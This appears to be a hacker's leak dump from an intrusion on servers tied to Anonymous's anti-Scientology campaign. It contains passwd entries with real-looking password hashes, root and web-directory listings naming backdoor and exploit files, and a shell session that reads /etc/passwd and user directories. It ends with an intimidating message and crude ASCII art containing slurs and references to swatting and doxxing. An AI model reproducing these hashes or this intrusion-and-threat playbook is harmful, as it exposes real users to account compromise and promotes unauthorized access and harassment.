ian:$1$KW5wFPNM$J1xzBja4bP/6qAtHHBKm//:1026:1026::0:0:User &:/home/ian:/usr/local/bin/bash kate:$1$.pMZPvPH$KKvicI7gzVfOMRWmtVfck0:1027:1027::0:0:Kate Stone:/home/kate:/usr/local/bin/bash untitledhosting:$1$R8QaOXJ.$zjw6dJXsIiVJlsWfYYKWk.:1028:1028::0:0:User &:/home/untitledhosting:/usr/local/bin/bash inkyslair:$1$UFYE2CK0$WrlYr6wPe32qU1j.xwLiz0:1029:1029::0:0:User &:/home/inkyslair:/usr/local/bin/bash >> ls -la /root total 38474 drwx------ 19 root wheel 2048 Mar 12 21:59 . drwxr-xr-x 18 root wheel 512 Jan 26 19:57 .. -rwx------ 1 root wheel 3015 Feb 18 01:18 .bash_h1story -rwx------ 1 root wheel 9711 Mar 22 21:17 .bash_history -rwx------ 1 root wheel 30 Dec 15 17:10 .bash_profile -rwx------ 1 root wheel 30 Dec 15 17:03 .bashrc drwx------ 4 root wheel 512 Jan 5 10:07 .cpan -rwx------ 2 root wheel 801 Jan 12 2007 .cshrc drwx------ 2 root wheel 512 Mar 11 01:01 .elinks -rwx------ 1 root wheel 892 Dec 16 11:47 .history drwx------ 2 root wheel 512 Dec 15 16:14 .irssi -rwx------ 1 root wheel 143 Jan 12 2007 .k5login -rw------- 1 root wheel 35 Mar 12 22:10 .lesshst drwx------ 2 root wheel 512 Mar 11 01:01 .links -rwx------ 1 root wheel 293 Jan 12 2007 .login -rwx------ 1 root wheel 1081 Feb 25 06:52 .mysql_history -rwx------ 1 root wheel 17401 Mar 12 21:59 .pinerc -rwx------ 2 root wheel 251 Jan 27 21:36 .profile -rw------- 1 root wheel 1024 Feb 25 06:33 .rnd drwx------ 2 root wheel 512 Jan 29 22:58 .ssh drwx------ 3 root wheel 512 Jan 4 07:59 .subversion -rwx------ 1 root wheel 0 Feb 18 01:18 .temp drwx------ 3 root wheel 512 Dec 16 02:48 .tremulous drwx------ 5 root wheel 512 Dec 18 22:15 .weechat drwx------ 2 root wheel 512 Dec 29 08:57 -rwx------ 1 root wheel 1764184 Dec 19 01:55 Railroad.zip -rwx------ 1 root wheel 205609 Dec 17 15:39 acidtechpurple.zip -rwx------ 1 root wheel 6 Feb 16 19:36 auth.log -rwx------ 1 root wheel 588 Dec 16 02:41 base-config.cfg -rwx------ 1 root wheel 223 Dec 16 02:40 base-confs.cfg -rwx------ 1 root wheel 4199 Feb 18 01:16 bd.pl -rwx------ 1 root wheel 0 Feb 17 14:55 bot.pl drwx------ 3 root wheel 512 Feb 4 03:08 brute -rwx------ 1 root wheel 65 Feb 19 02:15 db.opt -rwx------ 1 root wheel 1827 Dec 16 03:05 install-trem-server.pl drwx------ 2 root wheel 6144 Feb 19 02:15 lt3c_phpbb drwx------ 2 root wheel 512 Jan 23 15:01 mail drwx------ 5 root wheel 512 Dec 24 01:18 master -rwx------ 1 root wheel 45778 Dec 24 02:56 master.tgz -rwx------ 1 root wheel 4367618 Jan 27 09:16 mbox drwx------ 14 root wheel 512 Jan 6 07:20 mumble -rwx------ 1 root wheel 631037 Feb 5 00:52 myspace.jpg -rwx------ 1 root wheel 46 Feb 19 02:13 mysql_fix.txt -rwx------ 1 root wheel 10704 Dec 16 21:05 nmap.log -rwx------ 1 root wheel 0 Jan 27 00:09 sshd_log -rwx------ 1 root wheel 92 Dec 16 03:04 start.sh -rwx------ 1 root wheel 29529 Dec 23 21:59 sys.pl -rwx------ 1 root wheel 30932992 Feb 3 08:57 test100.zip drwx------ 7 root wheel 512 Feb 24 00:05 trunk -rwx------ 1 root wheel 1155345 Feb 18 02:08 ts2_server_rc2_202319.tar.bz2 drwx------ 7 zipservers 100 512 Feb 18 22:15 tss2_rc2 drwx------ 4 root wheel 512 Dec 15 17:53 utils >> ls -la /usr/home total 56 drwxr-xr-x 25 1013 1013 512 Mar 10 23:08 . drwxr-xr-x 20 root wheel 512 Mar 11 23:49 .. drwxr-xr-x 6 alma-server alma-server 512 Jan 21 07:40 alma-server drwxr-xr-x 3 1013 1013 512 Jan 27 09:22 aox drwxr-xr-x 4 helldive helldive 512 Feb 4 00:21 helldive drwxr-xr-x 2 httpd httpd 512 Jan 4 05:14 httpd drwxr-xr-x 5 ian ian 512 Mar 20 17:47 ian drwx------ 25 inaki inaki 1536 Mar 17 21:06 inaki drwxr-xr-x 2 inkyslair inkyslair 512 Mar 15 22:16 inkyslair drwxr-xr-x 3 1010 ircd 512 Dec 16 20:25 ircd drwxr-xr-x 4 kate kate 512 Feb 28 06:22 kate drwxr-xr-x 2 1013 1013 512 Dec 14 17:42 ltsvadmin drwxr-xr-x 5 mjestic mjestic 512 Jan 14 06:44 mjestic drwxr-xr-x 4 ms-clanserver ms-clanserver 512 Dec 17 04:12 ms-clanserver drwxr-xr-x 4 negroe negroe 512 Feb 9 10:21 negroe drwxr-xr-x 9 nt-server nt-server 512 Mar 9 01:36 nt-server drwxr-xr-x 3 1013 1013 512 Dec 16 02:28 powerover drwxr-xr-x 2 relentless relentless 512 Feb 7 16:55 relentless drwxr-xr-x 6 syense syense 512 Mar 17 07:51 syense drwxr-xr-x 4 test-serv test-serv 512 Jan 21 08:01 test-serv drwxr-xr-x 5 trem-maps trem-maps 6656 Feb 26 03:57 trem-maps drwxr-xr-x 4 trem12 trem12 512 Feb 18 22:53 trem12 drwxr-xr-x 5 tremulous tremulous 512 Mar 21 20:09 tremulous drwxr-xr-x 2 untitledhosting untitledhosting 512 Mar 7 15:18 untitledhosting drwxr-xr-x 2 1013 1013 512 Feb 23 07:23 zipservers >> ls -la invalid.site/www/ total 3718 drwxrwxrwx 3 root wheel 512 Mar 11 04:15 . drwxr-xr-x 4 root wheel 512 Feb 6 07:03 .. -rwxr-xr-x 1 root wheel 551940 Mar 1 04:58 __spl drwxr-xr-x 11 root wheel 2560 Mar 10 03:49 __sql -rwxr-xr-x 1 root wheel 13534 Mar 5 06:47 a.out -rw-r--r-- 1 root wheel 2412 Feb 15 07:40 attack.php -rw-r--r-- 1 root wheel 2412 Feb 15 07:40 attack.src -rwxr-xr-x 1 root wheel 4175 Mar 8 02:18 bd.txt -rwxr-xr-x 1 root wheel 4168 Mar 8 02:24 bd_2.txt -rwxrwxrwx 1 root wheel 4606 Feb 29 06:10 bopm.conf -rw-r--r-- 1 root wheel 5784 Mar 3 13:54 cute.php -rw-r--r-- 1 root wheel 706 Mar 9 06:23 dc.txt -rw-r--r-- 1 root wheel 5185 Mar 1 05:55 exp.pm -rw-r--r-- 1 root wheel 10486 Mar 1 06:10 get.txt -rw-r--r-- 1 root wheel 10423 Mar 1 06:00 get.txty -rw-r--r-- 1 root wheel 20 Mar 1 03:18 index.php -rw-r--r-- 1 root wheel 341 Mar 7 02:22 inf.txt -rwxr-xr-x 1 root wheel 13534 Mar 1 06:54 kmod -rw-r--r-- 1 root wheel 3740 Mar 15 13:56 kmod.c -rwxr-xr-x 1 root wheel 9014 Mar 5 06:47 krad -rw-r--r-- 1 root wheel 232 Feb 14 03:11 owned.php -rwxr-xr-x 1 root wheel 8574 Mar 1 06:17 perl_root -rw------- 1 httpd wheel 3072000 Mar 9 05:21 php-cgi.core -rw-r--r-- 1 root wheel 3457 Feb 29 06:33 repl.txt [root@athena:/var/www] >> ls -la lt3c.info/www/ total 712 drwxr-xr-x 7 httpd httpd 512 Feb 16 19:37 . drwxr-xr-x 4 httpd httpd 512 Jan 26 09:24 .. -rw-r--r-- 1 root httpd 205609 Dec 17 15:39 acidtechpurple.zip drwxr-xr-x 2 httpd httpd 512 Jan 31 02:23 css drwxr-xr-x 13 httpd httpd 1024 Feb 9 02:40 forum drwxr-xr-x 2 httpd httpd 512 Jan 31 05:34 images -rw-r--r-- 1 httpd httpd 3094 Mar 8 01:44 index.php drwxr-xr-x 2 httpd httpd 512 Mar 17 20:50 inky -rw-r--r-- 1 httpd httpd 267 Mar 8 01:44 lib.php drwxr-xr-x 2 httpd httpd 512 Jan 31 07:01 pages -rw-r--r-- 1 httpd httpd 904 Mar 8 01:44 temp.htm -rw-r--r-- 1 root httpd 45 Feb 12 08:27 uta.htm -rw-r--r-- 1 root httpd 214602 Feb 12 08:13 uta.pmd -rw-r--r-- 1 root httpd 211734 Feb 12 08:24 uta.qcp [root@athena:/var/www] >> ls -la partyvanradio.org/www/ total 6 drwxr-xr-x 2 relentless relentless 512 Feb 7 06:54 . drwxr-xr-x 4 root wheel 512 Feb 7 06:53 .. -rw-r--r-- 1 relentless relentless 166 Feb 7 07:13 index.php [root@athena:/var/www] >> ls -la untitledhosting.org/www/ total 74 drwxr-xr-x 10 untitledhosting untitledhosting 512 Mar 10 03:05 . drwxr-xr-x 4 root wheel 512 Mar 7 15:13 .. -rw-r--r-- 1 untitledhosting untitledhosting 8 Mar 10 03:05 LAWL drwxr-xr-x 4 untitledhosting untitledhosting 2048 Mar 10 02:47 admin -rwxr-xr-x 1 untitledhosting untitledhosting 5805 Mar 10 02:52 config.php drwxr-xr-x 2 untitledhosting untitledhosting 512 Mar 10 02:47 doc -rw-r--r-- 1 untitledhosting untitledhosting 318 Jan 3 02:56 favicon_cms.ico -rw-r--r-- 1 untitledhosting untitledhosting 330 Jan 3 02:56 fileloc.php drwxr-xr-x 3 untitledhosting untitledhosting 512 Mar 10 02:47 images -rw-r--r-- 1 untitledhosting untitledhosting 8187 Jan 3 02:56 include.php -rw-r--r-- 1 untitledhosting untitledhosting 9809 Jan 3 02:56 index.php drwxr-xr-x 11 untitledhosting untitledhosting 512 Mar 10 02:47 lib -rw-r--r-- 1 untitledhosting untitledhosting 961 Jan 3 02:56 moduleinterface.php drwxrwxrwx 12 untitledhosting untitledhosting 512 Mar 10 02:47 modules drwxr-xr-x 3 untitledhosting untitledhosting 2048 Mar 10 02:47 plugins -rw-r--r-- 1 untitledhosting untitledhosting 1955 Jan 3 02:56 preview.php -rw-r--r-- 1 untitledhosting untitledhosting 168 Jan 3 02:56 robots.txt -rw-r--r-- 1 untitledhosting untitledhosting 4161 Jan 3 02:56 soap.php -rw-r--r-- 1 untitledhosting untitledhosting 2535 Jan 3 02:56 stylesheet.css -rw-r--r-- 1 untitledhosting untitledhosting 5179 Jan 3 02:56 stylesheet.php drwxrwxrwx 6 untitledhosting untitledhosting 512 Mar 10 02:47 tmp drwxrwxrwx 4 untitledhosting untitledhosting 512 Mar 10 03:09 uploads -rw-r--r-- 1 untitledhosting untitledhosting 1127 Jan 3 02:56 version.php [root@athena:/var/www] >> ls -la /home/inaki/ total 157184 drwx------ 25 inaki inaki 1536 Mar 17 21:06 . drwxr-xr-x 25 1013 1013 512 Mar 10 23:08 .. -rwx------ 1 inaki inaki 10462 Mar 22 00:28 .bash_history -rwx------ 1 inaki inaki 30 Dec 16 17:56 .bash_profile -rwx------ 1 inaki inaki 30 Dec 16 17:56 .bashrc -rw-r--r-- 1 inaki inaki 14178 Mar 4 00:00 .bot_log -rwx------ 1 inaki inaki 767 Dec 15 16:07 .cshrc -rw-r--r-- 1 inaki inaki 6 Mar 17 21:06 .gay-state -rwx------ 1 inaki inaki 142 Dec 17 01:58 .history drwx------ 2 inaki inaki 512 Dec 18 22:12 .irssi -rw------- 1 inaki inaki 35 Mar 9 18:42 .lesshst drwx------ 2 inaki inaki 512 Jan 30 21:51 .links -rwx------ 1 inaki inaki 248 Dec 15 16:07 .login -rwx------ 1 inaki inaki 158 Dec 15 16:07 .login_conf -rwx------ 1 inaki inaki 373 Dec 15 16:07 .mail_aliases -rwx------ 1 inaki inaki 331 Dec 15 16:07 .mailrc -rwx------ 1 inaki inaki 797 Dec 15 16:07 .profile -rwx------ 1 inaki inaki 276 Dec 15 16:07 .rhosts -rwx------ 1 inaki inaki 975 Dec 15 16:07 .shrc drwx------ 2 inaki inaki 512 Feb 9 07:09 .ssh drwx------ 7 inaki inaki 512 Mar 17 16:56 .weechat -rw-r--r-- 1 inaki inaki 1330 Mar 10 03:53 InstallMorgan.pl drwxr-xr-x 2 inaki inaki 512 Mar 5 22:56 RFIscan drwx------ 17 inaki inaki 1536 Mar 12 21:55 Unreal3.2.7 -rwx------ 1 inaki inaki 2801622 Dec 29 09:01 Unreal3.2.7.tar.gz -rw-r--r-- 1 inaki inaki 12469 Mar 7 05:27 _good_rfis.txt drwx------ 7 inaki inaki 1024 Dec 27 22:44 anope-1.7.19 -rwx------ 1 inaki inaki 1505639 Jun 10 2007 anope-1.7.19.tar.gz drwx------ 8 inaki inaki 512 Jan 13 07:25 bopm drwx------ 5 inaki inaki 1024 Jan 13 07:02 bopm-3.1.3 -rwx------ 1 inaki inaki 819273 May 16 2007 bopm-3.1.3.tar.gz -rwx------ 1 inaki inaki 1424 Dec 27 21:59 bot.pl -rwx------ 1 inaki inaki 1401 Dec 25 08:31 bot.pl.save -rwx------ 1 inaki inaki 1417 Dec 27 21:57 bot.pl\ drwx------ 4 inaki inaki 512 Mar 3 14:10 botpanel -rwx------ 1 inaki inaki 11962 Feb 13 03:05 botpanel.tgz -rwx------ 1 inaki inaki 0 Dec 23 00:06 cigarette -rw-r--r-- 1 inaki inaki 1334 Mar 8 05:57 cleanrfi.pl drwxrwxrwx 3 inaki inaki 512 Feb 23 04:17 exe drwx------ 2 inaki inaki 512 Feb 9 07:43 flash -rwx------ 1 inaki inaki 130677 Jul 14 2007 gay -rwx------ 1 inaki inaki 2576 Nov 24 23:25 gen.pl -rwxr-xr-x 1 inaki inaki 655 Mar 5 02:45 getRFI.sh -rw-r--r-- 1 inaki inaki 121721 Mar 10 04:33 good_rfis.txt drwxrwxrwx 2 inaki inaki 512 Feb 21 04:08 images drwx------ 8 inaki inaki 512 Jan 5 09:48 ircd -rwx------ 1 inaki inaki 2457953 Dec 19 02:58 irssi -rwx------ 1 inaki inaki 530 Dec 19 01:34 jap.pl drwx------ 5 inaki inaki 512 Feb 17 15:56 jewgong -rwx------ 1 inaki inaki 1507 Jan 5 08:37 lol.sh -rwx------ 1 inaki inaki 5026 Feb 1 23:08 lolol drwx------ 4 inaki inaki 512 Jan 4 22:25 lulzhost.net -rwx------ 1 inaki inaki 45778 Dec 24 02:22 master.tgz drwx------ 7 inaki inaki 512 Dec 27 22:50 misc -rwx------ 1 inaki inaki 1993 Dec 1 19:39 mpdnp.pl drwx------ 2 inaki inaki 512 Feb 17 11:04 music -rwx------ 1 inaki inaki 9576448 Feb 3 09:29 openssl_installer.exe -rwx------ 1 inaki inaki 0 Feb 11 03:27 out drwx------ 2 inaki inaki 512 Jan 11 20:20 oxygen -rwx------ 1 inaki inaki 0 Nov 25 09:04 pizza drwx------ 2 inaki inaki 512 Jan 16 23:14 public_html drwx------ 2 inaki inaki 512 Jan 4 03:33 radiobot -rwx------ 1 inaki inaki 806 Dec 16 21:17 range -rw-r--r-- 1 inaki inaki 190367 Mar 21 21:52 rfis.txt drwx------ 3 inaki inaki 1024 Jan 14 00:38 seeborg-0.51 -rwx------ 1 inaki inaki 58113 Aug 15 2003 seeborg-0.51.tar.gz -rwx------ 1 inaki inaki 825 Dec 1 17:59 server.cfg -rwx------ 1 inaki inaki 14285284 Dec 25 03:00 sy.rar -rwx------ 1 inaki inaki 55 Dec 8 10:30 test -rwx------ 1 inaki inaki 67 Dec 7 12:48 test.sh drwx------ 3 inaki inaki 512 Jan 5 09:48 testircd -rwx------ 1 inaki inaki 0 Nov 24 22:00 trace.rt -rwx------ 1 inaki inaki 128561152 Mar 8 00:19 weechat-curses.core -rwx------ 1 inaki inaki 69 Dec 16 21:17 xh.pl >> ls -la /usr/home/mjestic/ total 204 drwxr-xr-x 5 mjestic mjestic 512 Jan 14 06:44 . drwxr-xr-x 25 1013 1013 512 Mar 10 23:08 .. -rw------- 1 mjestic mjestic 1404 Jan 14 06:52 .bash_history -rw-r--r-- 1 mjestic mjestic 767 Jan 14 05:18 .cshrc -rw-r--r-- 1 mjestic mjestic 248 Jan 14 05:18 .login -rw-r--r-- 1 mjestic mjestic 158 Jan 14 05:18 .login_conf -rw------- 1 mjestic mjestic 373 Jan 14 05:18 .mail_aliases -rw-r--r-- 1 mjestic mjestic 331 Jan 14 05:18 .mailrc -rw-r--r-- 1 mjestic mjestic 797 Jan 14 05:18 .profile -rw------- 1 mjestic mjestic 276 Jan 14 05:18 .rhosts -rw-r--r-- 1 mjestic mjestic 975 Jan 14 05:18 .shrc drwxr-xr-x 4 mjestic mjestic 512 Jan 14 06:45 .tremulous drwxr-xr-x 5 mjestic mjestic 512 Nov 8 07:29 arcade -rw-r--r-- 1 mjestic mjestic 178453 Nov 8 07:30 arcade-svn971-14-vm.tar.gz drwxr-xr-x 3 mjestic mjestic 512 Jan 14 06:46 trem-server [root@athena:/var/www] /* * * And now for partyvan.info * */ $ uname -a FreeBSD partyvan.info 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 $ w 12:22AM up 2:37, 0 users, load averages: 0.06, 0.06, 0.07 USER TTY FROM LOGIN@ IDLE WHAT $ ls apache22 squirrelmail $ pwd /usr/local/www $ cd apache22 $ ls -al total 14 drwxr-xr-x 6 root wheel 512 Mar 8 16:40 . drwxr-xr-x 4 root wheel 512 Mar 8 22:03 .. drwxr-xr-x 2 root wheel 512 Mar 8 16:40 cgi-bin drwxr-xr-x 28 root wheel 1536 Mar 8 22:01 data drwxr-xr-x 3 root wheel 1024 Mar 8 16:40 error drwxr-xr-x 3 root wheel 3584 Mar 8 16:40 icons $ cd data $ ls -al total 120006 drwxr-xr-x 28 root wheel 1536 Mar 8 22:01 . drwxr-xr-x 6 root wheel 512 Mar 8 16:40 .. drwxr-xr-x 3 root picatta 512 Mar 8 17:41 711chan -rwxr-xr-x 1 root picatta 825 Mar 5 12:48 AdminSettings.sample -rwxr-xr-x 1 root picatta 17997 Mar 5 12:48 COPYING -rwxr-xr-x 1 root picatta 162 Mar 5 12:48 FAQ -rwxr-xr-x 1 root picatta 175294 Mar 5 12:48 HISTORY -rwxr-xr-x 1 root picatta 3992 Mar 5 12:48 INSTALL -rw-r--r-- 1 root picatta 4522 Mar 5 12:48 LocalSettings.php -rwxr-xr-x 1 root picatta 27 Mar 5 12:48 Makefile -rwxr-xr-x 1 root picatta 44283 Mar 5 12:48 RELEASE-NOTES -rwxr-xr-x 1 root picatta 605 Mar 5 12:48 StartProfiler.php -rwxr-xr-x 1 root picatta 12816 Mar 5 12:48 UPGRADE -rwxr-xr-x 1 root picatta 1316 Mar 5 12:48 api.php drwxr-xr-x 2 root picatta 512 Mar 8 17:41 auth drwxr-xr-x 3 root wheel 512 Mar 8 17:41 backup drwxr-xr-x 2 root picatta 512 Mar 8 17:41 bin drwxr-xr-x 18 root picatta 512 Mar 8 17:41 cachedir drwxr-xr-x 2 root picatta 512 Mar 8 17:41 cgi-bin -rw-r--r-- 1 root picatta 1832 Mar 5 12:48 cheese.gif -rw-r--r-- 1 root picatta 1677 Mar 5 12:48 cheese2.gif -rwxr-xr-x 1 root picatta 122077184 Mar 5 12:48 core.21271 drwxr-xr-x 3 root picatta 512 Mar 8 17:41 dev drwxr-xr-x 4 root picatta 512 Mar 8 17:41 docs drwxr-xr-x 2 root picatta 512 Mar 8 17:41 donate -rw-r--r-- 1 root picatta 2037 Mar 5 12:48 epiccheese.js -rw-r--r-- 1 root picatta 2091 Mar 5 12:48 epicfail.js drwxr-xr-x 2 root picatta 512 Mar 8 17:41 extensions -rwxr-xr-x 1 root picatta 1150 Mar 5 12:48 favicon.ico drwxr-xr-x 2 root picatta 512 Mar 8 17:41 fimg -rwxr-xr-x 1 root picatta 1501 Mar 5 12:48 front.php -rwxr-xr-x 1 root picatta 173 Mar 5 12:48 google.html drwxr-xr-x 3 root picatta 512 Mar 8 17:41 hosted drwxr-xr-x 21 root picatta 512 Mar 8 17:41 images -rwxr-xr-x 1 root picatta 1978 Mar 5 12:48 img_auth.php drwxr-xr-x 7 root picatta 5632 Mar 8 17:41 includes -rwxr-xr-x 1 root picatta 113 Mar 5 12:48 index.dongs -rwxr-xr-x 1 root picatta 1513 Mar 5 12:48 index.old -rwxr-xr-x 1 root picatta 8716 Mar 5 12:48 index.php -rwxr-xr-x 1 root picatta 454 Mar 5 12:48 index.php__ -rwxr-xr-x 1 root picatta 21 Mar 5 12:48 info.php -rwxr-xr-x 1 root picatta 3899 Mar 5 12:48 install-utils.inc drwxr-xr-x 4 root picatta 512 Mar 8 17:41 languages -rwxr-xr-x 1 root picatta 584 Mar 5 12:48 load.php drwxr-xr-x 2 root picatta 512 Mar 8 17:41 locale -rwxr-xr-x 1 root picatta 3227 Mar 5 12:48 lol.css drwxr-xr-x 9 root picatta 4096 Mar 8 17:41 maintenance drwxr-xr-x 2 root picatta 512 Mar 8 17:41 math -rw-r--r-- 1 root picatta 0 Mar 5 12:48 merge.php -rwxr-xr-x 1 root picatta 19631 Mar 5 12:48 mudkipz.png -rwxr-xr-x 1 root picatta 1532 Mar 5 12:48 opensearch_desc.php -rwxr-xr-x 1 root picatta 65394 Mar 5 12:48 owned1.jpg -rwxr-xr-x 1 root picatta 67133 Mar 5 12:48 owned2.jpg -rw-r--r-- 1 picatta picatta 361 Mar 8 21:56 portl.html -rwxr-xr-x 1 root picatta 6173 Mar 5 12:48 profileinfo.php drwxr-xr-x 3 root picatta 512 Mar 8 17:41 public_ftp drwxr-xr-x 7 root picatta 1024 Mar 8 17:41 raid -rwxr-xr-x 1 root picatta 428 Mar 5 12:48 redir.php -rwxr-xr-x 1 root picatta 319 Mar 5 12:48 redirect.php -rwxr-xr-x 1 root picatta 91 Mar 5 12:48 redirect.phtml -rwxr-xr-x 1 root picatta 92 Mar 5 12:48 robots.txt -rwxr-xr-x 1 root picatta 1351 Mar 5 12:48 seal.php drwxr-xr-x 2 root picatta 512 Mar 8 17:41 serialized -rwxr-xr-x 1 root picatta 147770 Mar 5 12:48 shit.jpg drwxr-xr-x 10 root picatta 1024 Mar 8 17:41 skins drwxr-xr-x 3 root picatta 512 Mar 8 17:41 t -rwxr-xr-x 1 root picatta 6 Mar 5 12:48 test -rwxr-xr-x 1 root picatta 27 Mar 5 12:48 test.php -rwxr-xr-x 1 root picatta 53 Mar 5 12:48 test2.php drwxr-xr-x 2 root picatta 512 Mar 8 17:41 tests -rwxr-xr-x 1 root picatta 2408 Mar 5 12:48 thumb.php drwxr-xr-x 2 root picatta 512 Mar 8 17:41 tmp -rwxr-xr-x 1 root picatta 1384 Mar 5 12:48 trackback.php drwxr-xr-x 2 root picatta 512 Mar 8 17:41 vamp -rwxr-xr-x 1 root picatta 88 Mar 5 12:48 wiki.phtml -rwxr-xr-x 1 root picatta 1756 Mar 5 12:48 ~index.php $ cat LocalSettings.php $ cat /etc/passwd # $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin picatta:*:1001:1001:picatta:/home/picatta:/bin/sh general:*:1002:1002:general:/home/general:/bin/sh mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh $ ls -al /usr/home total 8 drwxr-xr-x 4 root wheel 512 Mar 8 07:48 . drwxr-xr-x 17 root wheel 512 Mar 8 07:48 .. drwxr-xr-x 2 general general 512 Mar 8 07:48 general drwxr-xr-x 2 picatta picatta 512 Mar 8 07:47 picatta $ cd ~picatta $ ls -al total 20 drwxr-xr-x 2 picatta picatta 512 Mar 8 07:47 . drwxr-xr-x 4 root wheel 512 Mar 8 07:48 .. -rw-r--r-- 1 picatta picatta 751 Mar 8 07:47 .cshrc -rw-r--r-- 1 picatta picatta 248 Mar 8 07:47 .login -rw-r--r-- 1 picatta picatta 158 Mar 8 07:47 .login_conf -rw------- 1 picatta picatta 373 Mar 8 07:47 .mail_aliases -rw-r--r-- 1 picatta picatta 331 Mar 8 07:47 .mailrc -rw-r--r-- 1 picatta picatta 766 Mar 8 07:47 .profile -rw------- 1 picatta picatta 276 Mar 8 07:47 .rhosts -rw-r--r-- 1 picatta picatta 975 Mar 8 07:47 .shrc $ cd ~general $ ls -al total 20 drwxr-xr-x 2 general general 512 Mar 8 07:48 . drwxr-xr-x 4 root wheel 512 Mar 8 07:48 .. -rw-r--r-- 1 general general 751 Mar 8 07:48 .cshrc -rw-r--r-- 1 general general 248 Mar 8 07:48 .login -rw-r--r-- 1 general general 158 Mar 8 07:48 .login_conf -rw------- 1 general general 373 Mar 8 07:48 .mail_aliases -rw-r--r-- 1 general general 331 Mar 8 07:48 .mailrc -rw-r--r-- 1 general general 766 Mar 8 07:48 .profile -rw------- 1 general general 276 Mar 8 07:48 .rhosts -rw-r--r-- 1 general general 975 Mar 8 07:48 .shrc $ cd /usr/local/www/apache22/data/auth $ ls -al total 8 drwxr-xr-x 2 root picatta 512 Mar 8 17:41 . drwxr-xr-x 28 root wheel 1536 Mar 8 22:01 .. -rwxr-xr-x 1 root picatta 2 Mar 5 12:47 account.txt -rwxr-xr-x 1 root picatta 169 Mar 5 12:47 login.php $ cat account.txt : $ cat login.php $ ls -al /var/mail total 4 drwxrwxr-x 2 root mail 512 Mar 8 22:05 . drwxr-xr-x 24 root wheel 512 Mar 8 22:05 .. -rw------- 1 cyrus cyrus 0 Mar 8 22:05 cyrus -rw------- 1 general general 0 Mar 8 07:48 general -rw------- 1 mysql mysql 0 Mar 8 16:38 mysql -rw------- 1 picatta picatta 0 Mar 8 07:47 picatta $ /*****************************************************************/ Well, that was fun... Remember, you are not as untouchable as you think you are. As long as you have a website up somewhere or are IRC'ing on public networks (btw, do you honestly think that EFNet provides a secure communications channel?) you are within the reach of those who would wish you harm. To be perfectly honest, you indoctrinate your members just as much as the supposed evil CoS that you fight against. I honestly don't see the difference between your methods and those that you allege they use. Your actions are childish. You attack sites and people that have done nothing to you and whom you have no battle with. Hell, a lot of the time you don't even attack the right target. That speaks volumes about your collective abilities. Again, we beseach you to remember that you are *not* untouchable. While 99% of the time you will anger people who have no power to hit back, or who have no friends with the ability to retaliate, the remaining 1% of the time you will anger people who can and will hurt you. Knock off this Chanology crap and go back to posting on 4chan and playing CounterStrike. You're in a world you know nothing about and you do not belong here. We would have dumped your MediaWiki DB but it was full of crap and only had 32 registered users. This was for you X. Hopefully it helps. ############################################################# # THE ADVENTURES OF # # __ # # .--------.|__|.----.----.-----. # # | || || __| _| _ | # # |__|__|__||__||____|__| |_____| # # __ # # .-----.-----.-----.|__|.-----. # # | _ | -__| || ||__ --| # # | __|_____|__|__||__||_____| # # |__| # # # ############################################################# # | # ________________________ # # | [] []# | | # # | # | r0fl3 i juST g0t | # # FUCK YOU! Co$! | [] []# |bunCH of RFI's from b0ts| # # \ | # |i r teh le3ats | # # \ | ____# | | # # lulz O_O i just | |___# | LUCKY!!11! | # # raged you so | # | | # # hard!! | ? __# '-.____________________.-' # # / | o | # |________| # #___8=D________________|__|_|_# ______/__________\______ # #/_/_/_/_/_/_/_/_/_/_/_/_/_/_/# |________________________| # # # |(type type) | # #- - - - - - - - - - # | \ _____ _____ | # # # | / ' \ | # ############################################################# # | # | # # r0flzc0ptu3z i just | [] []# SHUT UP Co$!! | [] []# # / | # / Thats IT! # # swated that f4g and | [] []# \ / | [] []# # \ | # \ I'M CALLING| # # \ | ____# \ \ | ____# # dropp3d his doc's | |___# \ The | |___# # i iz so0 |Go # / \| # # l33t!! |Away__# Whats zf0no? zf0no___# # / | 'o | # / | 'o | # #___8=D________________|__|_|_#___8=D________________|__|_|_# #/_/_/_/_/_/_/_/_/_/_/_/_/_/_/#/_/_/_/_/_/_/_/_/_/_/_/_/_/_/# # # # #- - - - - - - - - - #- - - - - - - - - - # # # # ############################################################# # # # ,-. __ # # ,' `---.___.---' `. # # ,' ,- `-._ # # ,' / \ .- # # ,\/ / zf0 + Rhino => zf0no \\ (( # # )`._)>) | \\// # # `>,' _ \ / |/ *-_ # # ) \ | | zf04 | | o `-. # # , / \ | `. | | o * (`-' # #\ \`-' )-| `. | / '- .' # #\`-` .` _/ \ _ )`-.___.--\ / O _`-._ # #_\_ ,'_____\ `.__/___________`. \_____,'^, c-)__# #__/ , ,'/_/_/_/_/\ /`/_/_/_/_/_/_/\ /_/_/(_`-' ^-'`)# # \__ / _) ( _) ( (^_ - _ |# #- -`--' - - - -/____\- - - - -/____\-(_,-. 8=D |# # `-_______* # 